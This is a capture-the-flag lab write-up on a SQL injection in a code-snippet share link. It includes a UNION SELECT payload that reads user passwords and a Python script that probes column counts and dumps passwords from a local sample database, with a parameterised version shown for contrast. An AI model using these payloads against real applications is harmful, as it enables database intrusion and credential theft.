CopyPasta
Today we have a lab with the hint "SQLi".
As usual, we click around in the application and look in Burp to see what we can use. Today was a bit harder, and that is because I did not click through all of the functionality.
When you share a snippet, a share link is created. This one is vulnerable to SQLi.


When we take that same request and put it into Burp, we can start crafting our UNION SELECT attack. When I hit six NULLs, I got feedback. Usually the flag is in the admin's password, so I crafted the payload `' union select 1,password,null,null,null,null from users--`.

And with the response, my flag 🇧🇪 was readable.
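The two steps above (padding a UNION SELECT with NULLs until the column count matches, then swapping one NULL for `password` from `users`) in a form you can run offline. This is an added example, not the lab's own code: it uses an in-memory SQLite database with a constructed six-column `snippets` table, a constructed `users` table and a made-up flag value, and the table and column names are assumptions. The vulnerable lookup is written the way a share-link handler would have to be written for this payload to work, next to the parameterised version that defeats it.

```python
import sqlite3

# Constructed sample schema and data (assumptions, not the lab's real tables).
# The snippets SELECT below returns six columns, matching the six NULLs the
# write-up needed before the UNION stopped erroring.
SCHEMA = """
CREATE TABLE snippets (
    id INTEGER PRIMARY KEY, share_id TEXT, title TEXT, body TEXT,
    language TEXT, owner TEXT, created_at TEXT
);
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO snippets VALUES (1, 'a1b2c3', 'hello', 'print(1)', 'python', 'alice', '2024-01-01');
INSERT INTO users VALUES (1, 'admin', 'flag{constructed-example}');
INSERT INTO users VALUES (2, 'alice', 'hunter2');
"""

SELECT_COLS = "id, title, body, language, owner, created_at"


def make_db():
    """Fresh in-memory database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, share_id):
    """Share-link handler as it must look for the payload to work: the share
    id is concatenated into the query, so a quote breaks out of the string."""
    sql = f"SELECT {SELECT_COLS} FROM snippets WHERE share_id = '{share_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, share_id):
    """Hardened handler: bound parameter, the share id is data, never SQL."""
    sql = f"SELECT {SELECT_COLS} FROM snippets WHERE share_id = ?"
    return conn.execute(sql, (share_id,)).fetchall()


def probe_column_count(conn, max_cols=10):
    """Grow the NULL list until the UNION stops raising a column-count error.
    The first count that succeeds is the width of the original SELECT."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["null"] * n)
        try:
            lookup_vulnerable(conn, f"' union select {nulls}--")
        except sqlite3.OperationalError:
            continue  # "SELECTs ... do not have the same number of result columns"
        return n
    return None


def dump_passwords(conn, cols):
    """The write-up's payload, with NULL padding sized from the probe step.
    The password is placed in the second (title) column, the one the app
    renders; the leading 1 keeps the id column well-typed."""
    padding = ",".join(["null"] * (cols - 2))
    payload = f"' union select 1,password,{padding} from users--"
    rows = lookup_vulnerable(conn, payload)
    return [row[1] for row in rows]


if __name__ == "__main__":
    db = make_db()
    width = probe_column_count(db)
    print("columns:", width)
    print("passwords:", dump_passwords(db, width))
    print("same payload against the safe handler:", lookup_safe(db, "' union select 1,password,null,null,null,null from users--"))
```

One caveat on the trailing comment: SQLite (and MSSQL) accept `--` directly against the rest of the line, but MySQL only treats `--` as a comment when it is followed by whitespace, so against a MySQL backend the payload needs `-- ` (note the space), `--+` in a URL, or `#` instead. If the lab's backend ignored your `--`, that is the first thing to check.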